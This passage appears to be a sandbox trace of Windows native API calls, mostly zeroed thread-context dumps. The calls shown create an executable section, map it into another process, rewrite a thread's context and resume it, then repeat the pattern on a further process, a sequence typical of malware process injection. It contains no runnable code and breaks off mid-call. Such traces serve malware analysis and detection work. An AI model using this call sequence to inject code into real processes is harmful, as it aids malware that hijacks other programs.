[160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0167.665] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0167.665] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xd9200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0xda000) returned 0x0 [0167.670] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0x138, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xd9200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x5f0000, SectionOffset=0x0, ViewSize=0xde6e8*=0xda000) returned 0x0 [0167.702] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0167.706] NtClose (Handle=0x140) returned 0x0 [0167.707] NtSetContextThread (ThreadHandle=0xb4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x263000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x636707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0167.720] NtResumeThread (in: ThreadHandle=0xb4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0167.720] NtClose (Handle=0x138) returned 0x0 [0167.720] NtClose (Handle=0xb4) returned 0x0 [0167.722] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0xba4, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0xb4) returned 0x0 [0167.722] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0167.722] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0167.722] NtReadVirtualMemory (in: ProcessHandle=0xb4, BaseAddress=0x258000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0167.723] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0167.725] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0xb9c) | out: ThreadHandle=0xdea64*=0x138) returned 0x0 [0167.725] NtSuspendThread (in: ThreadHandle=0x138, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0167.725] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xb4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x1ff0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0167.742] NtGetContextThread (in: ThreadHandle=0x138, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x258000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0167.745] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, 